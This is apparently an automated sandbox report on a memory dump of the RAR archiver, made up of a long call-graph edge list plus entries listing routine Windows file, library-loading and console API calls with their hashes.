39161->39163 39162->39161 39163->39164 39164->39156 39164->39157 39165->39150 39167 7ff75428b496 GetProcAddress 39166->39167 39168 7ff754277e45 39166->39168 39169 7ff75428b4cb GetProcAddress 39167->39169 39170 7ff75428b4ae 39167->39170 39171 7ff754257a68 39168->39171 39169->39168 39170->39169 39172 7ff754257a76 39171->39172 39192 7ff7542a2ae4 39172->39192 39174 7ff754257a80 39175 7ff7542a2ae4 setbuf 60 API calls 39174->39175 39176 7ff754257a94 39175->39176 39201 7ff754257b44 GetStdHandle GetFileType 39176->39201 39179 7ff754257b44 3 API calls 39180 7ff754257aae 39179->39180 39181 7ff754257b44 3 API calls 39180->39181 39183 7ff754257abe 39181->39183 39182 7ff754257b12 39191 7ff75425cd78 SetConsoleCtrlHandler 39182->39191 39184 7ff754257aeb 39183->39184 39204 7ff7542a2abc 31 API calls 2 library calls 39183->39204 39184->39182 39206 7ff7542a2abc 31 API calls 2 library calls 39184->39206 39187 7ff754257adf 39205 7ff7542a2b40 33 API calls 2 library calls 39187->39205 39189 7ff754257b06 39207 7ff7542a2b40 33 API calls 2 library calls 39189->39207 39194 7ff7542a2ae9 39192->39194 39193 7ff7542a7ee8 39208 7ff7542a4f3c 15 API calls setbuf 39193->39208 39194->39193 39196 7ff7542a7f23 39194->39196 39210 7ff7542a7d98 60 API calls 2 library calls 39196->39210 39197 7ff7542a7eed 39209 7ff7542a4e1c 31 API calls _invalid_parameter_noinfo 39197->39209 39200 7ff7542a7ef8 39200->39174 39202 7ff754257a9e 39201->39202 39203 7ff754257b61 GetConsoleMode 39201->39203 39202->39179 39203->39202 39204->39187 39205->39184 39206->39189 39207->39182 39208->39197 39209->39200 39210->39200 39211 7ff7542482f0 39212 7ff754248306 39211->39212 39223 7ff75424836f 39211->39223 39213 7ff754248324 39212->39213 39214 7ff754248371 39212->39214 39212->39223 39239 7ff754262414 61 API calls 39213->39239 39214->39223 39248 7ff754261998 138 API calls 39214->39248 39216 7ff754248347 39240 7ff754261998 138 API calls 39216->39240 39218 7ff75424835e 39241 7ff7542618ac 39218->39241 39222 7ff75424b540 147 API calls 39224 7ff75424854f 39222->39224 39234 7ff75424a410 39223->39234 39225 7ff754248578 39224->39225 39227 7ff75424b540 147 API calls 39224->39227 39226 7ff75424b540 147 API calls 39225->39226 39231 7ff75424858f 39226->39231 39227->39225 39228 7ff754248634 39229 7ff75429a610 _UnwindNestedFrames 8 API calls 39228->39229 39230 7ff754248663 39229->39230 39231->39228 39249 7ff754249628 175 API calls 39231->39249 39250 7ff754277a68 39234->39250 39237 7ff75424853a 39237->39222 39239->39216 39240->39218 39242 7ff7542618ca 39241->39242 39243 7ff7542618db 39241->39243 39242->39243 39244 7ff7542618de 39242->39244 39245 7ff7542618d6 39242->39245 39243->39223 39275 7ff754261930 39244->39275 39270 7ff754261c24 39245->39270 39248->39223 39249->39228 39252 7ff754277a8d 39250->39252 39257 7ff75424a434 39250->39257 39251 7ff754277aaf 39254 7ff7542622e0 12 API calls 39251->39254 39251->39257 39252->39251 39263 7ff754277340 157 API calls 39252->39263 39255 7ff754277adf 39254->39255 39256 7ff754262440 12 API calls 39255->39256 39256->39257 39257->39237 39258 7ff7542622e0 39257->39258 39264 7ff7542620b4 39258->39264 39261 7ff754262307 39261->39237 39263->39251 39267 7ff754262130 39264->39267 39268 7ff7542620d0 39264->39268 39265 7ff754262102 SetFilePointer 39266 7ff754262126 GetLastError 39265->39266 39265->39267 39266->39267 39267->39261 39269 7ff75425cd00 10 API calls 39267->39269 39268->39265 39271 7ff754261c3b 39270->39271 39272 7ff754261c37 39270->39272 39271->39272 39273 7ff754261c5d 39271->39273 39272->39243 39281 7ff754262d6c 12 API calls 2 library calls 39273->39281 39276 7ff75426194c 39275->39276 39277 7ff754261964 39275->39277 39276->39277 39279 7ff754261958 CloseHandle 39276->39279 39278 7ff754261988 39277->39278 39282 7ff75425c9d0 10 API calls 39277->39282 39278->39243 39279->39277 39281->39272 39282->39278 39283 7ff754241884 39415 7ff7542734e4 39283->39415 39286 7ff754241926 39288 7ff75424195b 39286->39288 39479 7ff754273f98 63 API calls 2 library calls 39286->39479 39287 7ff7542734e4 CompareStringW 39289 7ff7542418a6 39287->39289 39296 7ff754241970 39288->39296 39480 7ff754262ed8 100 API calls 3 library calls 39288->39480 39290 7ff7542734e4 CompareStringW 39289->39290 39295 7ff7542418b9 39289->39295 39290->39295 39294 7ff754241915 39478 7ff75425ca40 61 API calls _CxxThrowException 39294->39478 39295->39286 39477 7ff754241168 8 API calls 2 library calls 39295->39477 39298 7ff7542419b8 39296->39298 39481 7ff7542849f4 48 API calls 39296->39481 39419 7ff754245450 39298->39419 39300 7ff7542419b0 39482 7ff754258444 54 API calls fflush 39300->39482 39306 7ff7542472c4 76 API calls 39313 7ff754241a12 39306->39313 39307 7ff754241ae6 39453 7ff754247514 39307->39453 39308 7ff754241b04 39457 7ff754256c94 39308->39457 39311 7ff754241af2 39312 7ff754247514 72 API calls 39311->39312 39314 7ff754241aff 39312->39314 39313->39307 39313->39308 39316 7ff75429a610 _UnwindNestedFrames 8 API calls 39314->39316 39315 7ff754241b13 39473 7ff754247148 39315->39473 39317 7ff754242f97 39316->39317 39319 7ff754241c71 39320 7ff754241ca7 39319->39320 39321 7ff7542463e8 8 API calls 39319->39321 39322 7ff754241cd5 39320->39322 39323 7ff754241ce4 39320->39323 39324 7ff754241c91 39321->39324 39325 7ff75429a444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39322->39325 39326 7ff75429a444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39323->39326 39327 7ff7542449b8 99 API calls 39324->39327 39331 7ff754241cee 39325->39331 39326->39331 39328 7ff754241c9d 39327->39328 39329 7ff7542463e8 8 API calls 39328->39329 39329->39320 39330 7ff754241d50 39333 7ff75429a444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39330->39333 39331->39330 39332 7ff75428de30 72 API calls 39331->39332 39332->39330 39334 7ff754241d62 39333->39334 39335 7ff75428dbd0 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39334->39335 39336 7ff754241d7b 39334->39336 39335->39336 39337 7ff754292bcc 66 API calls 39336->39337 39338 7ff754241dba 39337->39338 39411 7ff75426ae10 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39338->39411 39339 7ff754241e1c 39341 7ff7542410c0 8 API calls 39339->39341 39343 7ff754241e5d 39339->39343 39340 7ff754241dde std::bad_alloc::bad_alloc 39340->39339 39342 7ff75429ba34 _CxxThrowException RtlPcToFileHeader RaiseException 39340->39342 39341->39343 39342->39339 39344 7ff75424a410 159 API calls 39343->39344 39409 7ff754241ef4 39343->39409 39344->39409 39345 7ff754242d0c 39347 7ff75428de30 72 API calls 39345->39347 39357 7ff754242d21 39345->39357 39346 7ff754242ccc 39346->39345 39410 7ff754268c80 72 API calls 39346->39410 39347->39357 39348 7ff754266688 48 API calls 39348->39409 39349 7ff754242d86 39354 7ff7542849f4 48 API calls 39349->39354 39393 7ff754242dd0 39349->39393 39350 7ff7542849f4 48 API calls 39408 7ff754242005 39350->39408 39351 7ff75428b6d0 73 API calls 39351->39408 39352 7ff754245e70 169 API calls 39352->39408 39353 7ff754258444 54 API calls 39353->39408 39361 7ff754242d9e 39354->39361 39355 7ff75424a504 208 API calls 39355->39393 39356 7ff7542480e4 192 API calls 39356->39393 39357->39349 39358 7ff7542849f4 48 API calls 39357->39358 39362 7ff754242d6c 39358->39362 39359 7ff754245928 237 API calls 39359->39408 39360 7ff75424e6c8 157 API calls 39360->39409 39363 7ff754258444 54 API calls 39361->39363 39365 7ff7542849f4 48 API calls 39362->39365 39366 7ff754242da6 39363->39366 39364 7ff754267c7c 127 API calls 39364->39393 39368 7ff754242d79 39365->39368 39373 7ff754261c24 12 API calls 39366->39373 39367 7ff75424b540 147 API calls 39367->39409 39371 7ff754258444 54 API calls 39368->39371 39369 7ff75425e21c 63 API calls 39369->39408 39370 7ff754241168 8 API calls 39370->39393 39371->39349 39372 7ff75424a410 159 API calls 39372->39409 39373->39393 39374 7ff75424a4d0 12 API calls 39374->39409 39375 7ff7542665b4 48 API calls 39375->39409 39376 7ff75428ae50 71 API calls 39380 7ff754242e39 39376->39380 39377 7ff754264554 16 API calls 39377->39409 39378 7ff754261998 138 API calls 39378->39409 39379 7ff7542433b4 64 API calls 39379->39393 39380->39376 39382 7ff75425ca40 61 API calls 39380->39382 39380->39393 39381 7ff754245db4 46 API calls 39381->39409 39382->39393 39383 7ff754261e80 15 API calls 39383->39409 39384 7ff754246188 231 API calls 39384->39393 39385 7ff754243f74 138 API calls 39385->39393 39386 7ff75424b540 147 API calls 39386->39408 39387 7ff754267c7c 127 API calls 39387->39409 39388 7ff754261930 11 API calls 39388->39409 39389 7ff75424571c 12 API calls 39389->39409 39390 7ff75427ba9c 195 API calls 39390->39393 39391 7ff7542849f4 48 API calls 39391->39393 39392 7ff754245004 49 API calls 39392->39409 39393->39355 39393->39356 39393->39364 39393->39370 39393->39379 39393->39380 39393->39384 39393->39385 39393->39390 39393->39391 39394 7ff754258444 54 API calls 39393->39394 39394->39393 39395 7ff7542618ac 15 API calls 39395->39409 39396 7ff754241168 8 API calls 39396->39409 39397 7ff75428d48c 58 API calls 39397->39409 39398 7ff754245e70 169 API calls 39398->39409 39399 7ff75428c0a8 10 API calls 39399->39409 39400 7ff754259be0 14 API calls 39400->39409 39401 7ff754266378 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39401->39409 39402 7ff7542797f0 GetStdHandle ReadFile GetLastError GetLastError GetFileType 39402->39409 39403 7ff75425cbd0 75 API calls 39403->39409 39404 7ff754265c0c 237 API calls 39404->39409 39405 7ff754265d40 237 API calls 39405->39409 39406 7ff754246114 216 API calls 39406->39409 39407 7ff754265708 237 API calls 39407->39409 39408->39350 39408->39351 39408->39352 39408->39353 39408->39359 39408->39369 39408->39386 39408->39409 39409->39346 39409->39348 39409->39360 39409->39367 39409->39372 39409->39374 39409->39375 39409->39377 39409->39378 39409->39381 39409->39383 39409->39387 39409->39388 39409->39389 39409->39392 39409->39395 39409->39396 39409->39397 39409->39398 39409->39399 39409->39400 39409->39401 39409->39402 39409->39403 39409->39404 39409->39405 39409->39406 39409->39407 39409->39408 39412 7ff75426a250 237 API calls 39409->39412 39413 7ff754250d60 237 API calls 39409->39413 39414 7ff75426aae0 237 API calls 39409->39414 39410->39345 39411->39340 39412->39409 39413->39408 39414->39408 39416 7ff7542734f6 39415->39416 39418 7ff754241893 39416->39418 39483 7ff75428dac0 CompareStringW 39416->39483 39418->39287 39418->39295 39420 7ff75424546f pre_c_initialization 39419->39420 39421 7ff75424554a __scrt_fastfail 39420->39421 39437 7ff754245588 __scrt_fastfail 39420->39437 39424 7ff75428c0a8 10 API calls 39421->39424 39423 7ff754245583 39513 7ff754246eb8 39423->39513 39425 7ff754245576 39424->39425 39428 7ff75424681c 54 API calls 39425->39428 39428->39423 39429 7ff7542456e9 39520 7ff754286f68 39429->39520 39431 7ff7542456f6 39432 7ff75429a610 _UnwindNestedFrames 8 API calls 39431->39432 39433 7ff7542419df 39432->39433 39439 7ff7542472c4 39433->39439 39437->39423 39484 7ff754243210 39437->39484 39490 7ff754257088 39437->39490 39494 7ff75424681c 39437->39494 39505 7ff754287a24 39437->39505 39524 7ff75424571c 39437->39524 39532 7ff754254380 14 API calls 39437->39532 39440 7ff7542472eb 39439->39440 39651 7ff7542588dc 39440->39651 39442 7ff754247302 39655 7ff75427915c 39442->39655 39444 7ff75424730f 39667 7ff754277044 39444->39667 39447 7ff7542473f5 __scrt_fastfail 39451 7ff754259be0 14 API calls 39447->39451 39448 7ff75429a444 new 4 API calls 39449 7ff7542473e3 39448->39449 39449->39447 39672 7ff75426894c 39449->39672 39452 7ff754241a01 39451->39452 39452->39306 39454 7ff754247539 39453->39454 39698 7ff75427922c 39454->39698 39459 7ff754256cbc 39457->39459 39461 7ff754256d45 39457->39461 39458 7ff754256d83 39458->39315 39460 7ff754256cd9 39459->39460 39709 7ff754279f78 8 API calls 2 library calls 39459->39709 39464 7ff754256cf3 39460->39464 39710 7ff754279f78 8 API calls 2 library calls 39460->39710 39461->39458 39462 7ff754256d69 39461->39462 39714 7ff754279f78 8 API calls 2 library calls 39461->39714 39462->39458 39715 7ff754279f78 8 API calls 2 library calls 39462->39715 39467 7ff754256d0d 39464->39467 39711 7ff754279f78 8 API calls 2 library calls 39464->39711 39470 7ff754256d2b 39467->39470 39712 7ff754279f78 8 API calls 2 library calls 39467->39712 39470->39458 39713 7ff754279f78 8 API calls 2 library calls 39470->39713 39474 7ff754247167 39473->39474 39475 7ff754247162 39473->39475 39716 7ff754246c64 130 API calls _UnwindNestedFrames 39475->39716 39477->39294 39478->39286 39479->39288 39480->39296 39481->39300 39482->39298 39483->39418 39485 7ff754243231 39484->39485 39489 7ff7542432e9 39484->39489 39485->39489 39533 7ff754254380 14 API calls 39485->39533 39487 7ff75424329c 39487->39489 39534 7ff754262a20 22 API calls 2 library calls 39487->39534 39489->39437 39491 7ff7542570a4 39490->39491 39492 7ff7542570c5 39491->39492 39535 7ff754268558 10 API calls 2 library calls 39491->39535 39492->39437 39536 7ff754246714 39494->39536 39496 7ff754246836 39497 7ff754246853 39496->39497 39547 7ff7542a48c0 39496->39547 39497->39437 39500 7ff7542468a9 std::bad_alloc::bad_alloc 39555 7ff75429ba34 RtlPcToFileHeader RaiseException 39500->39555 39502 7ff7542468c4 39556 7ff754247188 12 API calls 39502->39556 39504 7ff7542468eb 39504->39437 39510 7ff754287a4f 39505->39510 39511 7ff754287a59 39505->39511 39506 7ff754287a7c 39595 7ff75428b6d0 73 API calls _Init_thread_footer 39506->39595 39509 7ff754287b1c 60 API calls 39509->39511 39510->39437 39511->39506 39511->39509 39511->39510 39563 7ff7542871fc 39511->39563 39596 7ff7542541b0 14 API calls 2 library calls 39511->39596 39514 7ff754246ee6 39513->39514 39519 7ff754246f5c 39513->39519 39644 7ff754289f64 8 API calls __BuildCatchObjectHelper 39514->39644 39516 7ff754246efb 39517 7ff754246f2f 39516->39517 39516->39519 39517->39516 39645 7ff754247188 12 API calls 39517->39645 39519->39429 39521 7ff754286f8a 39520->39521 39522 7ff754286fb4 39520->39522 39521->39522 39523 7ff754264538 FindClose 39521->39523 39523->39521 39525 7ff754245742 39524->39525 39531 7ff75424575d 39524->39531 39525->39531 39650 7ff754273520 12 API calls 2 library calls 39525->39650 39529 7ff7542457fc 39529->39437 39530 7ff7542748bc 8 API calls 39530->39529 39646 7ff754273610 39531->39646 39532->39437 39533->39487 39534->39489 39535->39491 39537 7ff754246738 39536->39537 39546 7ff7542467a7 __BuildCatchObjectHelper 39536->39546 39538 7ff754246765 39537->39538 39557 7ff75425ca6c 48 API calls 3 library calls 39537->39557 39539 7ff754246786 39538->39539 39543 7ff7542467e1 39538->39543 39539->39546 39559 7ff75425cb64 8 API calls 39539->39559 39541 7ff754246759 39558 7ff75425cb64 8 API calls 39541->39558 39543->39546 39560 7ff75425cb64 8 API calls 39543->39560 39546->39496 39548 7ff7542a48f5 39547->39548 39551 7ff75424684b 39547->39551 39548->39551 39561 7ff7542a7094 31 API calls 2 library calls 39548->39561 39550 7ff7542a4924 39550->39551 39552 7ff7542a492d 39550->39552 39551->39497 39551->39500 39562 7ff7542a4e3c 16 API calls abort 39552->39562 39555->39502 39556->39504 39557->39541 39561->39550 39568 7ff754287217 pre_c_initialization 39563->39568 39564 7ff75429a610 _UnwindNestedFrames 8 API calls 39566 7ff75428776f 39564->39566 39566->39511 39578 7ff75428729c 39568->39578 39586 7ff75428725a 39568->39586 39589 7ff7542873c5 39568->39589 39604 7ff754264554 39568->39604 39569 7ff754287453 39571 7ff754287476 39569->39571 39572 7ff754287464 39569->39572 39591 7ff754287496 39571->39591 39601 7ff754264538 39571->39601 39612 7ff754287c38 55 API calls 3 library calls 39572->39612 39574 7ff754287471 39574->39571 39577 7ff754287342 39577->39586 39590 7ff754287656 39577->39590 39594 7ff7542876ef 39577->39594 39613 7ff754254380 14 API calls 39577->39613 39580 7ff7542873bb 39578->39580 39582 7ff75428732e 39578->39582 39581 7ff75429a444 new 4 API calls 39580->39581 39581->39589 39582->39577 39583 7ff75428734a 39582->39583 39585 7ff75428737e 39583->39585 39583->39586 39610 7ff754254380 14 API calls 39583->39610 39584 7ff754264554 16 API calls 39584->39586 39585->39586 39611 7ff75425cbd0 75 API calls 39585->39611 39586->39564 39597 7ff7542645cc 39589->39597 39590->39586 39590->39590 39592 7ff754287723 39590->39592 39590->39594 39591->39584 39591->39586 39614 7ff75424c214 8 API calls 2 library calls 39592->39614 39594->39586 39615 7ff754268558 10 API calls 2 library calls 39594->39615 39596->39511 39599 7ff7542645ed 39597->39599 39598 7ff7542646ec 15 API calls 39598->39599 39599->39598 39600 7ff7542646b2 39599->39600 39600->39569 39600->39577 39602 7ff754264549 FindClose 39601->39602 39603 7ff75426454f 39601->39603 39602->39603 39603->39591 39605 7ff754264570 39604->39605 39606 7ff754264574 39605->39606 39616 7ff7542646ec 39605->39616 39606->39578 39609 7ff75426458d FindClose 39609->39606 39610->39585 39611->39586 39612->39574 39613->39590 39614->39586 39615->39586 39617 7ff754264705 pre_c_initialization 39616->39617 39618 7ff7542647a4 FindNextFileW 39617->39618 39619 7ff754264733 FindFirstFileW 39617->39619 39621 7ff7542647ae GetLastError 39618->39621 39628 7ff75426478b 39618->39628 39620 7ff754264749 39619->39620 39619->39628 39629 7ff754274534 39620->39629 39621->39628 39624 7ff75429a610 _UnwindNestedFrames 8 API calls 39627 7ff754264587 39624->39627 39625 7ff75426477a GetLastError 39625->39628 39626 7ff75426475f FindFirstFileW 39626->39625 39626->39628 39627->39606 39627->39609 39628->39624 39630 7ff754274549 pre_c_initialization 39629->39630 39640 7ff7542745a2 39630->39640 39641 7ff75427472c CharUpperW 39630->39641 39632 7ff75429a610 _UnwindNestedFrames 8 API calls 39634 7ff75426475b 39632->39634 39633 7ff754274579 39642 7ff754274760 CharUpperW 39633->39642 39634->39625 39634->39626 39636 7ff754274592 39637 7ff754274629 GetCurrentDirectoryW 39636->39637 39638 7ff75427459a 39636->39638 39637->39640 39643 7ff75427472c CharUpperW 39638->39643 39640->39632 39641->39633 39642->39636 39643->39640 39644->39516 39645->39517 39647 7ff754273626 pre_c_initialization wcschr 39646->39647 39648 7ff75429a610 _UnwindNestedFrames 8 API calls 39647->39648 39649 7ff7542457e1 39648->39649 39649->39529 39649->39530 39650->39531 39652 7ff754258919 39651->39652 39677 7ff754284b14 39652->39677 39654 7ff754258954 __scrt_fastfail 39654->39442 39656 7ff754279199 39655->39656 39657 7ff75429a480 4 API calls 39656->39657 39658 7ff7542791be 39657->39658 39659 7ff75429a444 new 4 API calls 39658->39659 39660 7ff7542791cf 39659->39660 39661 7ff7542791e1 39660->39661 39662 7ff7542588dc 8 API calls 39660->39662 39663 7ff75429a444 new 4 API calls 39661->39663 39662->39661 39664 7ff7542791f7 39663->39664 39665 7ff754279209 39664->39665 39666 7ff7542588dc 8 API calls 39664->39666 39665->39444 39666->39665 39668 7ff7542588dc 8 API calls 39667->39668 39669 7ff754277063 39668->39669 39670 7ff7542772c0 4 API calls 39669->39670 39671 7ff754247325 39670->39671 39671->39447 39671->39448 39682 7ff754287d80 39672->39682 39678 7ff754284b2b 39677->39678 39679 7ff754284b26 39677->39679 39678->39654 39681 7ff754284b38 8 API calls _UnwindNestedFrames 39679->39681 39681->39678 39689 7ff754288094 39682->39689 39685 7ff754268a44 39686 7ff754268a5a __scrt_fastfail 39685->39686 39693 7ff75428bac4 39686->39693 39690 7ff75428809f 39689->39690 39691 7ff754287ec8 68 API calls 39690->39691 39692 7ff75426896e 39691->39692 39692->39685 39696 7ff75428ba70 GetCurrentProcess GetProcessAffinityMask 39693->39696 39697 7ff7542689c5 39696->39697 39697->39447 39700 7ff754279245 39698->39700 39706 7ff754266194 72 API calls 39700->39706 39701 7ff7542792b1 39707 7ff754266194 72 API calls 39701->39707 39703 7ff7542792bd 39708 7ff754266194 72 API calls 39703->39708 39705 7ff7542792c9 39706->39701 39707->39703 39708->39705 39709->39460 39710->39464 39711->39467 39712->39470 39713->39461 39714->39462 39715->39458 39716->39474 39717 7ff754243b53 39718 7ff754243b64 39717->39718 39767 7ff754261e80 39718->39767 39719 7ff754243c09 39779 7ff7542623f0 39719->39779 39721 7ff754243c18 39784 7ff754248050 157 API calls 39721->39784 39722 7ff754243bb6 39722->39719 39722->39721 39723 7ff754243c01 39722->39723 39725 7ff754261c24 12 API calls 39723->39725 39725->39719 39726 7ff754243c3d 39785 7ff754248010 13 API calls 39726->39785 39727 7ff754243ccc 39749 7ff754243c90 39727->39749 39792 7ff754262414 61 API calls 39727->39792 39730 7ff754243c45 39733 7ff754243c54 39730->39733 39786 7ff75425cba8 75 API calls 39730->39786 39732 7ff754243cf9 39793 7ff754261998 138 API calls 39732->39793 39787 7ff75424a9d4 186 API calls wcschr 39733->39787 39737 7ff754243c5c 39788 7ff7542493ac 8 API calls 39737->39788 39738 7ff754243d10 39740 7ff7542618ac 15 API calls 39738->39740 39740->39749 39741 7ff754243c66 39743 7ff754243c77 39741->39743 39789 7ff75425ca40 61 API calls _CxxThrowException 39741->39789 39790 7ff754248090 8 API calls 39743->39790 39746 7ff754243c7f 39746->39749 39791 7ff75425ca40 61 API calls _CxxThrowException 39746->39791 39794 7ff75428d400 48 API calls 39749->39794 39768 7ff754261e95 pre_c_initialization 39767->39768 39769 7ff754261ecb CreateFileW 39768->39769 39770 7ff754261f59 GetLastError 39769->39770 39773 7ff754261fb8 39769->39773 39771 7ff754274534 10 API calls 39770->39771 39774 7ff754261f74 39771->39774 39772 7ff754261ff7 39776 7ff75429a610 _UnwindNestedFrames 8 API calls 39772->39776 39773->39772 39775 7ff754261fd9 SetFileTime 39773->39775 39774->39773 39777 7ff754261f78 CreateFileW GetLastError 39774->39777 39775->39772 39778 7ff75426203a 39776->39778 39777->39773 39778->39722 39795 7ff7542624e8 39779->39795 39782 7ff75426240e 39782->39727 39784->39726 39785->39730 39787->39737 39788->39741 39789->39743 39790->39746 39791->39749 39792->39732 39793->39738 39801 7ff754261af0 39795->39801 39798 7ff7542623f9 39798->39782 39800 7ff75425ca40 61 API calls _CxxThrowException 39798->39800 39800->39782 39802 7ff754261b01 pre_c_initialization 39801->39802 39803 7ff754261b6f CreateFileW 39802->39803 39804 7ff754261b68 39802->39804 39803->39804 39805 7ff754261be1 39804->39805 39806 7ff754274534 10 API calls 39804->39806 39809 7ff75429a610 _UnwindNestedFrames 8 API calls 39805->39809 39807 7ff754261bb3 39806->39807 39807->39805 39808 7ff754261bb7 CreateFileW 39807->39808 39808->39805 39810 7ff754261c14 39809->39810 39810->39798 39811 7ff75425ca08 10 API calls 39810->39811 39811->39798
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000004D.00000002.2350435810.00007FF754241000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF754240000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350400526.00007FF754240000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350493933.00007FF7542B0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350531475.00007FF7542C8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350568728.00007FF7542C9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350597587.00007FF7542CA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350597587.00007FF7542D4000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350597587.00007FF7542DE000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350597587.00007FF7542E6000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350749934.00007FF7542E8000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350798129.00007FF7542EE000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_77_2_7ff754240000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: %s%s $.ext$exe$rar$sfx$,6$BK$q:
                                                                                                                                                                                                                                                • API String ID: 0-1660254149
                                                                                                                                                                                                                                                • Opcode ID: 14afee9f14b9eaff1e48b0d421ac562d9ccd6413f16e33708596e859f96beb8d
                                                                                                                                                                                                                                                • Instruction ID: 0e4de8aab5a183fe0aee8838e6cb5b3edf49623b911d34d3da460f238eb7dd49
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 14afee9f14b9eaff1e48b0d421ac562d9ccd6413f16e33708596e859f96beb8d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 22E2C232A08AE285EB24EF27D4A42FDB7A1FB45788F894035CA4D47796DF3AD544C720

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF754284AE0: FreeLibrary.KERNEL32(?,?,00000000,00007FF75425CC90), ref: 00007FF754284AF5
                                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(?,?,?,00007FF754277E7D), ref: 00007FF75428492E
                                                                                                                                                                                                                                                • GetVersionExW.KERNEL32(?,?,?,00007FF754277E7D), ref: 00007FF75428496A
                                                                                                                                                                                                                                                • LoadLibraryExW.KERNELBASE(?,?,?,00007FF754277E7D), ref: 00007FF754284993
                                                                                                                                                                                                                                                • LoadLibraryW.KERNEL32(?,?,?,00007FF754277E7D), ref: 00007FF75428499F
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000004D.00000002.2350435810.00007FF754241000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF754240000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350400526.00007FF754240000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350493933.00007FF7542B0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350531475.00007FF7542C8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350568728.00007FF7542C9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350597587.00007FF7542CA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350597587.00007FF7542D4000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350597587.00007FF7542DE000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350597587.00007FF7542E6000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350749934.00007FF7542E8000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350798129.00007FF7542EE000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_77_2_7ff754240000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Library$Load$FileFreeModuleNameVersion
                                                                                                                                                                                                                                                • String ID: rarlng.dll
                                                                                                                                                                                                                                                • API String ID: 2520153904-1675521814
                                                                                                                                                                                                                                                • Opcode ID: 4ea004210bc8b62a292722e0c73661c8a5f08de7266e224b8a6e63eb6450ac69
                                                                                                                                                                                                                                                • Instruction ID: f78f327dc8e27511a9ed7850c5d6bc1cff7bd15e197ea1ccce9d6fc67776453a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4ea004210bc8b62a292722e0c73661c8a5f08de7266e224b8a6e63eb6450ac69
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EB313432618B6286FB64EF22D8A02EDB764FB45784FC84035E94D43694EF3ED555C720

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FindFirstFileW.KERNELBASE(?,?,00000000,?,?,00007FF754264620,?,00000000,?,00007FF754287A8C), ref: 00007FF754264736
                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,00000000,?,?,00007FF754264620,?,00000000,?,00007FF754287A8C), ref: 00007FF75426476B
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000000,?,?,00007FF754264620,?,00000000,?,00007FF754287A8C), ref: 00007FF75426477A
                                                                                                                                                                                                                                                • FindNextFileW.KERNELBASE(?,?,00000000,?,?,00007FF754264620,?,00000000,?,00007FF754287A8C), ref: 00007FF7542647A4
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000000,?,?,00007FF754264620,?,00000000,?,00007FF754287A8C), ref: 00007FF7542647B2
